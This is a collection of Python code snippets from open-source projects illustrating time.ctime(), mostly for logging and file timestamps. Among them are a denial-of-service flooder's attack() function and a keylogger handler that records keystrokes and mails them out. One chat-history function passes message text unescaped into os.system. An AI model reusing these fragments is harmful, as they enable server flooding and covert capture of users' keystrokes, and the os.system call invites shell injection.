The following 50 code examples, extracted from open-source Python projects, illustrate how to use time.ctime().
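Before the project examples, here is a minimal standalone sketch of the two ways time.ctime() is typically called. The printed values are illustrative only, since the output depends on the local clock and timezone:

import os
import time

# No argument: format the current local time as a fixed-width string.
print(time.ctime())                    # e.g. 'Tue Sep  5 10:14:07 2017'

# One argument: format a given epoch timestamp (seconds since 1970-01-01).
print(time.ctime(0))                   # e.g. 'Thu Jan  1 00:00:00 1970' on a UTC system

# A pattern that recurs in the examples below: human-readable file times.
print(time.ctime(os.path.getmtime(__file__)))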
def __init__(self, localaddr, remoteaddr):
    self._localaddr = localaddr
    self._remoteaddr = remoteaddr
    asyncore.dispatcher.__init__(self)
    try:
        self.create_socket(socket.AF_INET, socket.SOCK_STREAM)
        # try to re-use a server port if possible
        self.set_reuse_addr()
        self.bind(localaddr)
        self.listen(5)
    except:
        # cleanup asyncore.socket_map before raising
        self.close()
        raise
    else:
        print >> DEBUGSTREAM, \
            '%s started at %s\n\tLocal addr: %s\n\tRemote addr:%s' % (
            self.__class__.__name__, time.ctime(time.time()),
            localaddr, remoteaddr)
def flatten(self, msg, unixfrom=False):
    """Print the message object tree rooted at msg to the output file
    specified when the Generator instance was created.

    unixfrom is a flag that forces the printing of a Unix From_ delimiter
    before the first object in the message tree.  If the original message
    has no From_ delimiter, a `standard' one is crafted.  By default, this
    is False to inhibit the printing of any From_ delimiter.

    Note that for subobjects, no From_ line is printed.
    """
    if unixfrom:
        ufrom = msg.get_unixfrom()
        if not ufrom:
            ufrom = 'From nobody ' + time.ctime(time.time())
        print >> self._fp, ufrom
    self._write(msg)
def load_stats(self, arg):
    if not arg:
        self.stats = {}
    elif isinstance(arg, basestring):
        f = open(arg, 'rb')
        self.stats = marshal.load(f)
        f.close()
        try:
            file_stats = os.stat(arg)
            arg = time.ctime(file_stats.st_mtime) + " " + arg
        except:  # in case this is not unix
            pass
        self.files = [arg]
    elif hasattr(arg, 'create_stats'):
        arg.create_stats()
        self.stats = arg.stats
        arg.stats = {}
    if not self.stats:
        raise TypeError, "Cannot create or construct a %r object from '%r'" % (
            self.__class__, arg)
    return
def __str__(self):
    lines = []
    lines.append("{0:s} object, bound to {1:s}.".format(self.__class__.__name__, self._cb.session.server))
    if self._last_refresh_time:
        lines.append(" Last refreshed at {0:s}".format(time.ctime(self._last_refresh_time)))
    if not self._full_init:
        lines.append(" Partially initialized. Use .refresh() to load all attributes")
    lines.append("-"*79)
    lines.append("")
    for attr in sorted(self._info):
        status = "   "
        if attr in self._dirty_attributes:
            if self._dirty_attributes[attr] is None:
                status = "(+)"
            else:
                status = "(*)"
        val = str(self._info[attr])
        if len(val) > 50:
            val = val[:47] + u"..."
        lines.append(u"{0:s} {1:>20s}: {2:s}".format(status, attr, val))
    return "\n".join(lines)
def run(self):
    while self.finish_time == 0:
        time.sleep(.25)
        global_step_val, = self.sess.run([self.global_step_op])
        if self.start_time == 0 and global_step_val >= self.start_at_global_step:
            # Use tf.logging.info instead of log_fn, since print (which is
            # log_fn) is not thread safe and may interleave the outputs from
            # two parallel calls to print, which can break tests.
            tf.logging.info('Starting real work at step %s at time %s' %
                            (global_step_val, time.ctime()))
            self.start_time = time.time()
            self.start_step = global_step_val
        if self.finish_time == 0 and global_step_val >= self.end_at_global_step:
            tf.logging.info('Finishing real work at step %s at time %s' %
                            (global_step_val, time.ctime()))
            self.finish_time = time.time()
            self.finish_step = global_step_val
def build_full_record_to(pathToFullRecordFile):
    """structure of full record:
    {commitID: {'build-time': time, files: {filename: {record}, filename: {record}}}}
    """
    full_record = {}

    # this leads to being Killed by OS due to tremendous memory consumption...
    #if os.path.isfile(pathToFullRecordFile):
    #    with open(pathToFullRecordFile, 'r') as fullRecordFile:
    #        print "loading full record from " + pathToFullRecordFile
    #        full_record = eval(fullRecordFile.read())
    #        print "read full record from " + pathToFullRecordFile
    #else:
    full_record = build_full_record()
    #    f = open(pathToFullRecordFile, 'w')
    #    try:
    #        f.write(repr(full_record) + "\n")
    #    except MemoryError as me:
    #        print me
    #        raise
    #    finally:
    #        print time.ctime()
    #        f.close()
    #    print "built full record, wrote to " + pathToFullRecordFile

    return full_record
def build_full_record_to(path_to_full_record_file):
    """structure of full record:
    {commitID: {'build-time': time, files: {filename: {record}, filename: {record}}}}
    """
    full_record = build_full_record()
    if DO_PRINT_RECORDS:
        f = open(path_to_full_record_file, 'w')
        try:
            f.write(repr(full_record) + "\n")
        except MemoryError as me:
            print me
            raise
        finally:
            print time.ctime()
            f.close()
        print "built full record, wrote to " + path_to_full_record_file
    return full_record
def attack():
    ip = socket.gethostbyname(host)
    global n
    msg = str(string.letters + string.digits + string.punctuation)
    data = "".join(random.sample(msg, 5))
    dos = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        n += 1
        dos.connect((ip, port))
        dos.send("GET /%s HTTP/1.1\r\n" % data)
        print "\n " + time.ctime().split(" ")[3] + " " + "[" + str(n) + "] #-#-# Hold Your Tears #-#-#"
    except socket.error:
        print "\n [ No connection! Server maybe down ] "
    dos.close()
def run(interval, command):
    print_ts("-"*100)
    print_ts("Command %s" % command)
    print_ts("Starting every %s seconds." % interval)
    print_ts("-"*100)
    while True:
        try:
            # sleep for the remaining seconds of interval
            time_remaining = interval - time.time() % interval
            print_ts("Sleeping until %s (%s seconds)..." % ((time.ctime(time.time() + time_remaining)), time_remaining))
            time.sleep(time_remaining)
            print_ts("Starting command.")
            # execute the command
            status = os.system(command)
            print_ts("-"*100)
            print_ts("Command status = %s." % status)
        except Exception, e:
            print e
def run(self, edit):
    """Sublime Text plugin run method."""
    # Note, if one changes the header, this might need to change too.
    pattern = util.get_vhdl_setting(self, 'vhdl-modified-time-string')
    region = self.view.find(pattern, 0)
    #print('Region Diagnostics')
    #print('------------------')
    #print('Begin: {}'.format(region.begin()))
    #print('End: {}'.format(region.end()))
    #print('Empty? {}'.format(region.empty()))
    if not region.empty():
        region = self.view.line(region)
        date = time.ctime(time.time())
        new_mtime = pattern + '{}'.format(date)
        self.view.replace(edit, region, new_mtime)
        print('vhdl-mode: Updated last modified time.')
    else:
        print('vhdl-mode: No last modified time field found.')

#----------------------------------------------------------------
def convert_all_files_in_path(self, path):
    if not os.path.exists(path):
        print("'%s': Path doesn't exist. Skipping" % path)
        return
    count = 0
    for filename in os.listdir(path):
        full_path = os.path.join(path, filename)
        only_name, ext = os.path.splitext(full_path)
        cmd = None
        pyfile = None
        if fnmatch.fnmatch(filename, '*.ui'):
            pyfile = '%s.py' % only_name
            cmd = self.PYUIC
        elif fnmatch.fnmatch(filename, '*.qrc'):
            pyfile = '%s_rc.py' % only_name
            cmd = self.PYRCC
        if cmd and modified(full_path, pyfile):
            cmd_string = '%s -o "%s" "%s"' % (cmd, pyfile, full_path)
            os.system(cmd_string)
            count += 1
    print("'%s': %s converted %s files" % (path, time.ctime(time.time()), count))
def file_mod_time(filepath):
    try:
        import time
        return time.ctime(os.path.getmtime(filepath))
    except Exception as e:
        if DEBUG_FLAG:
            sys.stderr.write("Naked Framework Error: unable to return file modification data with the file_mod_time() function (Naked.toolshed.system).")
        raise e

#------------------------------------------------------------------------------
#
# FILE LISTINGS
#
#------------------------------------------------------------------------------

#------------------------------------------------------------------------------
# [ list_all_files function ] (list)
#  returns a list of all files in developer specified directory
#  Tests: test_SYSTEM.py :: test_sys_list_all_files, test_sys_list_all_files_emptydir
#------------------------------------------------------------------------------
def print_history(self, response, channel_name):
    os.system("clear; figlet '" + channel_name + "' | lolcat")
    response["messages"].reverse()
    text = ""
    for i in response["messages"]:
        if "user" in i:
            text += "\033[31m" + self.find_user_name(i["user"]) + "\033[0m" + "\t\t"
        elif "username" in i:
            text += "\033[31m" + (i["username"].encode('ascii', 'ignore').decode('ascii')) + "\033[0m" + "\t"
        text += "\033[93m" + time.ctime(float(i["ts"])) + "\033[0m" + "\n"
        # replace username_id with username
        if "<@" in i["text"]:
            i["text"] = "<" + i["text"].split("|")[1]
        text += (i["text"].encode('ascii', 'ignore').decode('ascii')) + "\n\n"
        os.system("echo ' " + text + "'")
        text = ""
def log(self, proto, data):
    if not self.logging:
        return
    peer = self.transport.getPeer()
    their_peer = self.otherConn.transport.getPeer()
    f = open(self.logging, "a")
    f.write("%s\t%s:%d %s %s:%d\n" % (time.ctime(),
                                      peer.host, peer.port,
                                      ((proto == self and '<') or '>'),
                                      their_peer.host, their_peer.port))
    while data:
        p, data = data[:16], data[16:]
        f.write(string.join(map(lambda x: '%02X' % ord(x), p), ' ') + ' ')
        f.write((16 - len(p)) * 3 * ' ')
        for c in p:
            if len(repr(c)) > 3:
                f.write('.')
            else:
                f.write(c)
        f.write('\n')
    f.write('\n')
    f.close()
def update_schedule(self, result=None, retval=None, extra_args=None):
    nowTime = time()
    nowTimereal = ctime(nowTime)
    if nowTime > 10000:
        print '[NTP]: setting E2 unixtime:', nowTime
        print '[NTP]: setting E2 realtime:', nowTimereal
        setRTCtime(nowTime)
        if config.misc.SyncTimeUsing.value == "1":
            eDVBLocalTimeHandler.getInstance().setUseDVBTime(False)
        else:
            eDVBLocalTimeHandler.getInstance().setUseDVBTime(True)
        eEPGCache.getInstance().timeUpdated()
        self.timer.startLongTimer(int(config.misc.useNTPminutes.value) * 60)
    else:
        print 'NO TIME SET'
        self.timer.startLongTimer(10)
def __repr__(self):
    timertype = {
        TIMERTYPE.NONE: "nothing",
        TIMERTYPE.WAKEUP: "wakeup",
        TIMERTYPE.WAKEUPTOSTANDBY: "wakeuptostandby",
        TIMERTYPE.AUTOSTANDBY: "autostandby",
        TIMERTYPE.AUTODEEPSTANDBY: "autodeepstandby",
        TIMERTYPE.STANDBY: "standby",
        TIMERTYPE.DEEPSTANDBY: "deepstandby",
        TIMERTYPE.REBOOT: "reboot",
        TIMERTYPE.RESTART: "restart"
    }[self.timerType]
    if not self.disabled:
        return "PowerTimerEntry(type=%s, begin=%s)" % (timertype, ctime(self.begin))
    else:
        return "PowerTimerEntry(type=%s, begin=%s Disabled)" % (timertype, ctime(self.begin))
def getPriorityCheck(self, prioPT, prioPTae):
    shiftPT = breakPT = False
    nextPTlist = NavigationInstance.instance.PowerTimer.getNextPowerManagerTime(getNextTimerTyp=True)
    for entry in nextPTlist:
        # check timers that will start or end within the next 15 mins
        if abs(entry[0] - time()) > 900:
            continue
        # faketime
        if entry[1] is None and entry[2] is None and entry[3] is None:
            if debug: print "shift#2 - entry is faketime", ctime(entry[0]), entry
            shiftPT = True
            continue
        # is timer in list itself?
        if entry[0] == self.begin and entry[1] == self.timerType and entry[2] is None and entry[3] == self.state \
                or entry[0] == self.end and entry[1] is None and entry[2] == self.afterEvent and entry[3] == self.state:
            if debug: print "entry is itself", ctime(entry[0]), entry
            nextPTitself = True
        else:
            nextPTitself = False
        if (entry[1] in prioPT or entry[2] in prioPTae) and not nextPTitself:
            if debug: print "break#2 <= 900", ctime(entry[0]), entry
            breakPT = True
            break
    return shiftPT, breakPT
def TimeSynctimer(self):
    now = time()
    self.syncCount += 1
    if now <= 31536000:
        if self.syncCount <= 24 and now <= 31536000:  # max 2 mins or when time is in sync
            self.timesynctimer.start(5000, True)
        else:
            print "~"*100
            print "[NAVIGATION] time sync failure, current time is %s, sync time is %s sec." % (ctime(now), (self.syncCount * 5))
            if self.timertime > 0:
                print "[NAVIGATION] next '%s' starts at %s" % ({0: "record-timer", 1: "zap-timer", 2: "power-timer", 3: "plugin-timer"}[self.wakeuptyp], ctime(self.timertime))
            else:
                print "[NAVIGATION] no next timers"
            print "="*100
            # workaround for normal operation if no time sync after e2 start - box is in standby
            self.gotopower()
    else:
        print "~"*100
        print "[NAVIGATION] time sync successful, current time is %s, sync time is %s sec." % (ctime(now), (self.syncCount * 5))
        self.wakeupCheck()
def log_events(log_info, type_event):
    log_msg = "[" + time.ctime() + "]" + "\n" + log_info
    if type_event == "fuzzing":
        try:
            fd = open('fuzz.log', 'a')
        except IOError as err:
            return "[!] Error opening log file: %s" % str(err)
    elif type_event == "error":
        try:
            fd = open('error.log', 'a')
        except IOError as err:
            return "[!] Error opening error file: %s" % str(err)
    else:
        return "[!] '%s' is an unrecognized log event type." % type_event
    if fd:
        fd.write(log_msg)
    return
def show_workspace_files(user_id, special_type='uploads'):
    import time
    import base64
    user_files = []
    user_path = os.path.join(get_config('env', 'workspace'), str(user_id), special_type)
    if not os.path.exists(user_path):
        os.makedirs(user_path)
    for file_name in os.listdir(user_path):
        file_path = os.path.join(user_path, file_name)
        tmp = dict()
        tmp['name'] = file_name
        tmp['file_size'] = os.path.getsize(file_path)
        tmp['file_create'] = time.ctime(os.path.getctime(file_path))
        tmp['trace'] = base64.b64encode(os.path.join(special_type, file_name))
        tmp['raw'] = os.path.join(special_type, file_name)
        user_files.append(tmp)
    user_files = sorted(user_files, key=lambda user_files: user_files['name'])
    return user_files
def predict_tf_all(path=None):
    result_list = []
    p = m_Pool(31)
    result_list = p.map(predict_tf_once, range(1, 32))
    p.close()
    p.join()
    print 'writing...'
    result_df = pd.DataFrame(index=range(1))
    for day, result in result_list:
        day_s = str(day)
        if len(day_s) <= 1:
            day_s = '0' + day_s
        result_df['201610' + day_s] = result
    result_df = result_df.T
    result_df.columns = ['predict_power_consumption']
    if path == None:
        date = str(pd.Timestamp(time.ctime())).replace(' ', '_').replace(':', '_')
        path = './result/' + date + '.csv'
    result_df.to_csv(path, index_label='predict_date')
    l = map(lambda day: pd.DataFrame.from_csv('./result/predict_part/%d.csv' % day), range(1, 32))
    t = pd.concat(l)
    t.to_csv('./result/predict_part/' + date + '.csv')
def signal_handler(signum, *kwargs):
    """ A handler for various interrupts """
    global exit_flag
    exit_flag = True
    if signum == signal.SIGINT:
        print(ERROR + "user quit" + Style.RESET_ALL)
    else:
        print(ERROR + "signal caught: {}".format(signum) + Style.RESET_ALL)
    print("[*] shutting down at {}".format(time.ctime()))
    # give the threads time to terminate
    time.sleep(2)
    sys.exit(0)
def cache_it(self, key, f, time_expire):
    if self.debug:
        self.r_server.incr('web2py_cache_statistics:misses')
    cache_set_key = self.cache_set_key
    expire_at = int(time.time() + time_expire) + 120
    bucket_key = "%s:%s" % (cache_set_key, expire_at / 60)
    value = f()
    value_ = pickle.dumps(value, pickle.HIGHEST_PROTOCOL)
    if time_expire == 0:
        time_expire = 1
    self.r_server.setex(key, time_expire, value_)
    # print '%s will expire on %s: it goes in bucket %s' % (key, time.ctime(expire_at))
    # print 'that will expire on %s' % (bucket_key, time.ctime(((expire_at / 60) + 1) * 60))
    p = self.r_server.pipeline()
    # add bucket to the fixed set
    p.sadd(cache_set_key, bucket_key)
    # sets the key
    p.setex(key, time_expire, value_)
    # add the key to the bucket
    p.sadd(bucket_key, key)
    # expire the bucket properly
    p.expireat(bucket_key, ((expire_at / 60) + 1) * 60)
    p.execute()
    return value
def do_ls(self, wildcard, display=True):
    if self.loggedIn is False:
        logging.error("Not logged in")
        return
    if self.tid is None:
        logging.error("No share selected")
        return
    if wildcard == '':
        pwd = ntpath.join(self.pwd, '*')
    else:
        pwd = ntpath.join(self.pwd, wildcard)
    self.completion = []
    pwd = string.replace(pwd, '/', '\\')
    pwd = ntpath.normpath(pwd)
    for f in self.smb.listPath(self.share, pwd):
        if display is True:
            print "%crw-rw-rw- %10d %s %s" % (
                'd' if f.is_directory() > 0 else '-',
                f.get_filesize(),
                time.ctime(float(f.get_mtime_epoch())),
                f.get_longname())
        self.completion.append((f.get_longname(), f.is_directory()))
def draw(self, context):
    layout = self.layout
    netsettings = context.scene.network_render

    row = layout.row()
    row.template_list("UI_UL_list", "net_render_slaves", netsettings, "slaves",
                      netsettings, "active_slave_index", rows=2)

    sub = row.column(align=True)
    sub.operator("render.netclientslaves", icon='FILE_REFRESH', text="")
    sub.operator("render.netclientblacklistslave", icon='ZOOMOUT', text="")

    if len(netrender.slaves) > netsettings.active_slave_index >= 0:
        layout.separator()

        slave = netrender.slaves[netsettings.active_slave_index]

        layout.label(text="Name: " + slave.name)
        layout.label(text="Address: " + slave.address[0])
        layout.label(text="Seen: " + time.ctime(slave.last_seen))
        layout.label(text="Stats: " + slave.stats)
def draw(self, context):
    layout = self.layout
    netsettings = context.scene.network_render

    row = layout.row()
    row.template_list("UI_UL_list", "net_render_slaves_blacklist", netsettings, "slaves_blacklist",
                      netsettings, "active_blacklisted_slave_index", rows=2)

    sub = row.column(align=True)
    sub.operator("render.netclientwhitelistslave", icon='ZOOMOUT', text="")

    if len(netrender.blacklist) > netsettings.active_blacklisted_slave_index >= 0:
        layout.separator()

        slave = netrender.blacklist[netsettings.active_blacklisted_slave_index]

        layout.label(text="Name: " + slave.name)
        layout.label(text="Address: " + slave.address[0])
        layout.label(text="Seen: " + time.ctime(slave.last_seen))
        layout.label(text="Stats: " + slave.stats)
def getos():
    dagitim = platform.dist()
    dagitim = dagitim[0]
    mimari = platform.machine()
    osys = platform.system()
    unumber = os.getuid()
    zaman = time.ctime()
    if unumber == 0:
        kulanici = "root"
    else:
        kulanici = "No root"
    bilgi = """
============================
CPU: {}
OS: {}
DAGITIM: {}
KULANICI: {}
ZAMAN: {}
============================""".format(mimari, osys, dagitim, kulanici, zaman)
    print(bilgi)
def logBasicSettings():
    # record basic user inputs and settings to log file for future purposes
    import getpass, time

    f = open(textFilePath, 'a+')
    f.write("\n################################################################################################################\n")
    f.write("Executing \"Export SSURGO Shapefiles\" tool\n")
    f.write("User Name: " + getpass.getuser() + "\n")
    f.write("Date Executed: " + time.ctime() + "\n")
    f.write("User Parameters:\n")
    f.write("\tFile Geodatabase Feature Dataset: " + inLoc + "\n")
    f.write("\tExport Folder: " + outLoc + "\n")
    #f.write("\tArea of Interest: " + AOI + "\n")
    f.close()

## ===================================================================================
def save(self):
    # save frames info, do not overwrite.
    filepath = os.path.join(self.framedir, 'frames.json')
    obj = {
        'ctime': time.ctime(),
        'device': self.device_info,
        'frames': self.frames,
    }
    with open(filepath, 'w') as f:
        json.dump(obj, f, indent=2)

    # save draft info
    filepath = os.path.join(self.framedir, 'draft.json')
    with open(filepath, 'w') as f:
        json.dump(self.case_draft, f, indent=2)

    # make a copy at casedir
    filepath = os.path.join(self.casedir, 'case.json')
    with open(filepath, 'w') as f:
        json.dump(self.case_draft, f, indent=2)

    # generate_script
    self.generate_script()
def test_max_timeout(context, event_loop):
    temp_dir = os.path.join(context.config['work_dir'], "timeout")
    context.config['task_script'] = (
        sys.executable, TIMEOUT_SCRIPT, temp_dir
    )
    context.config['task_max_timeout'] = 3
    event_loop.run_until_complete(task.run_task(context))
    try:
        event_loop.run_until_complete(asyncio.sleep(10))  # Let kill() calls run
    except RuntimeError:
        pass
    files = {}
    for path in glob.glob(os.path.join(temp_dir, '*')):
        files[path] = (time.ctime(os.path.getmtime(path)), os.stat(path).st_size)
        print("{} {}".format(path, files[path]))
    for path in glob.glob(os.path.join(temp_dir, '*')):
        print("Checking {}...".format(path))
        assert files[path] == (time.ctime(os.path.getmtime(path)), os.stat(path).st_size)
    assert len(files.keys()) == 6


# claim_work {{{1
def log(level, console_color, html_color, fmt, *args, **kwargs):
    global last_no, buffer_lock, buffer, buffer_size
    string = '%s - [%s] %s\n' % (time.ctime()[4:-5], level, fmt % args)
    buffer_lock.acquire()
    try:
        set_console_color(console_color)
        sys.stderr.write(string)
        set_console_color(reset_color)
        last_no += 1
        buffer[last_no] = string
        buffer_len = len(buffer)
        if buffer_len > buffer_size:
            del buffer[last_no - buffer_size]
    except Exception as e:
        string = '%s - [%s]LOG_EXCEPT: %s, Except:%s<br>' % (time.ctime()[4:-5], level, fmt % args, e)
        last_no += 1
        buffer[last_no] = string
        buffer_len = len(buffer)
        if buffer_len > buffer_size:
            del buffer[last_no - buffer_size]
    finally:
        buffer_lock.release()

#=================================================================
def view_reading_list(opts):
    """
    get the current reading list
    :param opts:
    """
    if os.path.isfile(READING_LIST_ENTRY_FILE_PATH):
        with open(READING_LIST_ENTRY_FILE_PATH) as reading_list_entry:
            file_contents = yaml.load(reading_list_entry)
        file_contents = dict(file_contents)
        last_updated = time.ctime(os.path.getmtime(READING_LIST_ENTRY_FILE_PATH))
        query = opts[1]
        params = opts[0]
        search = ''
        if query != 'None':
            search = "(filtered by " + params + ": " + query + ")"
            filtered_contents = [article for article in file_contents['entries']
                                 if is_in_params(params, query, article)]
            file_contents = dict(entries=filtered_contents)
        chalk.blue("Your awesome reading list " + search)
        chalk.blue("Last updated: " + last_updated)
        print_reading_list(file_contents)
    else:
        empty_list_prompt()
def crawl(url):
    """Fetch the given URL and return a list of the text extracted from its content blocks."""
    try:
        html = requests.get(url)
    except:
        with open("log.log", "a") as file:
            file.write("Http error on " + time.ctime())
        time.sleep(60)
        return None
    soup = BeautifulSoup(html.text, 'lxml')
    data_list = []
    for cont in soup.find_all("div", {"class": "content"}):
        raw_data = cont.get_text()
        data = raw_data.replace("\n", "")
        data_list.append(data)
    return data_list
def OnKeyboardEvent(event):
    global yourgmail, yourgmailpass, sendto, interval
    data = '\n[' + str(time.ctime().split(' ')[3]) + ']' \
        + ' WindowName : ' + str(event.WindowName)
    data += '\n\tKeyboard key :' + str(event.Key)
    data += '\n===================='
    global t, start_time
    t = t + data
    if len(t) > 500:
        f = open('Logfile.txt', 'a')
        f.write(t)
        f.close()
        t = ''
    if int(time.time() - start_time) == int(interval):
        Mail_it(t, pics_names)
        t = ''
    return True
def info(log: str, target='console'):
    """
    log: text to record.
    target: 'console' to print the log on screen, or a file to write to.
    """
    if target == 'console':
        thd = threading.Thread(target=print, args=(ctime(), ':', log))
        thd.setDaemon(True)
        thd.start()
        thd.join()
    else:
        try:
            thd = threading.Thread(target=print, args=(ctime(), ':', log))
            thd.setDaemon(True)
            thd.start()
            thd.join()
        except Exception as e:
            print(e)
def check_file_freshness(filename, newer_than=3600):
    """
    Check a file exists, is readable and is newer than <n> seconds (where
    <n> defaults to 3600).
    """
    # First check the file exists and is readable
    if not os.path.exists(filename):
        raise CriticalError("%s: does not exist." % (filename))
    if os.access(filename, os.R_OK) == 0:
        raise CriticalError("%s: is not readable." % (filename))

    # Then ensure the file is up-to-date enough
    mtime = os.stat(filename).st_mtime
    last_modified = time.time() - mtime
    if last_modified > newer_than:
        raise CriticalError("%s: was last modified on %s and is too old "
                            "(> %s seconds)." % (filename, time.ctime(mtime), newer_than))
    if last_modified < 0:
        raise CriticalError("%s: was last modified on %s which is in the "
                            "future." % (filename, time.ctime(mtime)))
def download_course_tarball(self):
    '''
    Download tar.gz of full course content (via Studio)
    '''
    self.ensure_studio_site()
    if self.verbose:
        print "Downloading tar.gz for %s" % (self.course_id)
    url = '%s/export/%s?_accept=application/x-tgz' % (self.BASE, self.course_id)
    r3 = self.ses.get(url)
    if not r3.ok or (r3.status_code == 404):
        url = '%s/export/slashes:%s+%s?_accept=application/x-tgz' % (self.BASE, self.course_id.replace('/', '+'), sem)
        r3 = self.ses.get(url)
    dt = time.ctime(time.time()).replace(' ', '_').replace(':', '')
    ofn = '%s/COURSE-%s___%s.tar.gz' % (self.data_dir, self.course_id.replace('/', '__'), dt)
    self.ensure_data_dir_exists()
    with open(ofn, 'w') as fp:
        fp.write(r3.content)
    print "--> %s" % (ofn)
    return ofn
def cache_it(self, key, f, time_expire):
    if self.debug:
        self.r_server.incr('web2py_cache_statistics:misses')
    cache_set_key = self.cache_set_key
    expireat = int(time.time() + time_expire) + 120
    bucket_key = "%s:%s" % (cache_set_key, expireat / 60)
    value = f()
    value_ = pickle.dumps(value, pickle.HIGHEST_PROTOCOL)
    if time_expire == 0:
        time_expire = 1
    self.r_server.setex(key, time_expire, value_)
    #print '%s will expire on %s: it goes in bucket %s' % (key, time.ctime(expireat))
    #print 'that will expire on %s' % (bucket_key, time.ctime(((expireat/60) + 1)*60))
    p = self.r_server.pipeline()
    #add bucket to the fixed set
    p.sadd(cache_set_key, bucket_key)
    #sets the key
    p.setex(key, time_expire, value_)
    #add the key to the bucket
    p.sadd(bucket_key, key)
    #expire the bucket properly
    p.expireat(bucket_key, ((expireat / 60) + 1) * 60)
    p.execute()
    return value
def getTimeTagStr(self):
    """Return the TimeTag as a human-readable string"""
    fract, secs = math.modf(self.timetag)
    out = time.ctime(secs)[11:19]
    out += ("%.3f" % fract)[1:]
    return out
def main_process(self, topicId):
    # print id
    reqdata = {'liveId': topicId}
    reqheaders = {'Content-type': 'application/x-www-form-urlencoded',
                  'Accept': 'application/json',
                  'Host': 'h5-zb.leju.com',
                  'X-Requested-With': 'XMLHttpRequest',
                  'Origin': 'http://h5-zb.leju.com',
                  'Referer': 'http://zhichang.renren.com',
                  'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0',}
                  #'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36', }
    time.sleep(random.random())
    while True:
        nowTime = time.ctime()
        r = requests.post(self.url, data=reqdata, headers=reqheaders)
        msg = '====' + topicId + '===='
        tmpDict = r.json()
        if ('errorMsg' in tmpDict):
            errMsg = tmpDict['errorMsg']
            print (nowTime + msg + errMsg)
        if ('result' in tmpDict):
            print (nowTime + msg + str(tmpDict['result']))
        time.sleep(60.33)
def get_cnonce(self, nonce):
    # The cnonce-value is an opaque
    # quoted string value provided by the client and used by both client
    # and server to avoid chosen plaintext attacks, to provide mutual
    # authentication, and to provide some message integrity protection.
    # This isn't a fabulous effort, but it's probably Good Enough.
    dig = hashlib.sha1("%s:%s:%s:%s" % (self.nonce_count, nonce, time.ctime(),
                                        randombytes(8))).hexdigest()
    return dig[:16]
def GenerateBanner(self):
    return '/* This file has been automatically generated, you must _NOT_ edit it directly. (%s) */\n' % time.ctime()

# Private methods
def _cnonce():
    dig = _md5("%s:%s" % (time.ctime(),
                          ["0123456789"[random.randrange(0, 9)] for i in range(20)])).hexdigest()
    return dig[:16]